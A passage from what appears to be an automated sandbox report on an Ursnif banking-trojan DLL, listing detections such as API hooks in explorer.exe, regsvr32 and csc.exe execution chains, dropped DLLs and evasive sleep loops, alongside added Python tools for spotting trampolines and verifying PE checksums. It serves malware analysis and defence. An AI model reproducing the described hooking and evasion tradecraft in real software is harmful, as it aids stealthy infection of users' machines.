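    for addr, text, target in scan_push_ret(CODE, base=0x013A0000):
        tgt = f" -> {target:08X}" if target is not None else ""
        print(f"{addr:08X}  {text}{tgt}")
```

Run it over a dumped code region (for instance the `.sdmp` memory segments a sandbox exports) and compare the recovered targets with the module's legitimate export range; a `push imm32; ret` whose target lies in a different, unbacked allocation is the usual sign of a trampoline into injected code.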
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_010449B3
PE file contains an invalid checksum
Source: jtmpm3o0.dll.35.dr Static PE information: real checksum: 0x0 should be: 0x661a
Source: hupbkl0t.dll.41.dr Static PE information: real checksum: 0x0 should be: 0x8132
Source: wnczrnms.dll.46.dr Static PE information: real checksum: 0x0 should be: 0x9e33
Source: kon0vos3.dll.38.dr Static PE information: real checksum: 0x0 should be: 0x7727
Source: 61b85f75e6a7c.dll Static PE information: real checksum: 0x1ba6ec should be: 0x1c2401
Source: gmpgobli.dll.48.dr Static PE information: real checksum: 0x0 should be: 0x2130
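The mismatches above fall into two classes: a stored value of 0x0 means the linker never wrote a checksum (csc.exe does not, which is why all five dropped DLLs show it), while a non-zero value that disagrees with the recomputed one, as for 61b85f75e6a7c.dll, typically means the image was modified after linking (patched, appended to, or packed). The script below is an added example, not part of this report or of the sample, that re-implements the PE image checksum (the algorithm behind imagehlp's CheckSumMappedFile) and classifies a file as unset, valid or invalid. The `build_stub_pe` helper and its 256-byte header-only image are constructed for the demonstration; to check a real file, pass its bytes to `verify_pe_checksum`.

```python
from __future__ import annotations

import struct


def checksum_field_offset(data: bytes) -> int:
    """Locate IMAGE_OPTIONAL_HEADER.CheckSum.

    e_lfanew (DOS header offset 0x3C) points at the "PE\0\0" signature; the
    20-byte COFF file header follows, and CheckSum sits at offset 64 of the
    optional header for both PE32 and PE32+.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 64


def compute_pe_checksum(data: bytes) -> int:
    """Recompute the image checksum the way CheckSumMappedFile does.

    One's-complement sum over the whole file, skipping the CheckSum field,
    folded to 16 bits, plus the file length. Summing 32-bit words and folding
    the carries yields the same value as the 16-bit word sum.
    """
    skip = checksum_field_offset(data)          # dword-aligned in valid images
    padded = data + b"\0" * (-len(data) % 4)    # pad for the walk only
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:                    # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)    # fold 32 -> 16 bits
    total += total >> 16
    return (total & 0xFFFF) + len(data)         # original, unpadded length


def read_stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify_pe_checksum(data: bytes) -> str:
    """Classify a file as 'unset' (CheckSum == 0), 'valid' or 'invalid'."""
    stored = read_stored_checksum(data)
    if stored == 0:
        return "unset"      # linker emitted none: csc.exe output, many packers
    return "valid" if stored == compute_pe_checksum(data) else "invalid"


def build_stub_pe(stored_checksum: int, extra: dict[int, int] | None = None) -> bytes:
    """Constructed 256-byte header-only image for the demonstration.

    Only the fields the checksum walk reads are populated ("MZ", e_lfanew,
    "PE\0\0", CheckSum); it is not a loadable PE. `extra` patches arbitrary
    dwords so carry handling can be exercised.
    """
    img = bytearray(256)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", img, 0x40 + 4 + 20 + 64, stored_checksum)
    for off, val in (extra or {}).items():
        struct.pack_into("<I", img, off, val)
    return bytes(img)


if __name__ == "__main__":
    import sys
    from pathlib import Path

    if len(sys.argv) > 1:                       # python pe_checksum.py some.dll
        blob = Path(sys.argv[1]).read_bytes()
        print(f"stored 0x{read_stored_checksum(blob):x} "
              f"computed 0x{compute_pe_checksum(blob):x} -> {verify_pe_checksum(blob)}")
    else:
        unset = build_stub_pe(0)                # like the csc.exe-built DLLs above
        good = build_stub_pe(compute_pe_checksum(unset))
        bad = build_stub_pe(0xDEADBEEF)
        for name, blob in ("unset", unset), ("good", good), ("bad", bad):
            print(name, verify_pe_checksum(blob))
```

Windows only enforces the checksum for kernel drivers and a few boot-critical system images, so a wrong value never stops a user-mode DLL from loading; treat it as a triage signal that the file on disk is not what the linker produced, not as a control.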
Registers a DLL
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline"

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2728 Thread sleep count: 31 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 2687 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1542 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -592128s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1728 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -82944s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 588 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -56448s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1716 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -41184s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 1395 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep time: -267840s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 174 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2516 Thread sleep count: 44 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440 Thread sleep count: 5010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876 Thread sleep count: 861 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2320 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep time: -922337203685477s >= -30000s
